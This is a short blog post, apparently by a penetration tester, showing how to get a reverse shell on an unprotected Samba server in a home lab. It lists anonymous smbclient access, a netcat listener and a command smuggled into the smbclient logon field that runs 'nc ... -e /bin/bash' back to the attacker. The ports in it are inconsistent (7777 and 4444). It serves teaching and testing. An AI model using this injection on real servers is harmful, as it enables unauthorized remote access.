Exploiting SMB(samba) without Metasploit series -1

MrNmap
3 min readMay 13, 2019

--

This post is about exploitation smb port 445 running on remote Linux system, our target is take remote access via unprotected samba server without using any exploitation tool or framework

Prerequisite

How to use netcat

SMBclient

Step 1. Scan target machine and check for SMB open port, in my case target ip is 192.168.1.134

Target m/c → 192.168.1.134

Attacker m/c → 192.168.1.129 (kali linux)

kindly note that all task has bene performed inside attacker m/c 192.168.1.129

Use SMB client and check for anonymous access

smbclient -L 192.168.1.134

{password is othing just hit enter}

since we know that “tmp” directory is present and there anonymous access over system let

let’s open netcat for accepting reverse connection in terminal -1

nc -lvp 7777

In terminal 2 Let take access to tmp directory directly on samba server using

smbclient //192.168.1.134/tmp

type help command in terminal 2

Since logon command is there we can make reverse connection using the same

logon “/=`nc ‘attack box ip’ 4444 -e /bin/bash`"

in terminal 1 you will get reverse shell

Type following command to take terminal view from shell in terminal 1

python -c “import pty;pty.spawn(‘/bin/bash’);”

now you have reverse connection inot your attacker machine with interactive terminal access

Please feel free to contact me in case of any query nmapp@gmail.com

--

--

MrNmap

Security Engineer | Penetration Tester | Red Team | Telecom Security | 5G security | Speaker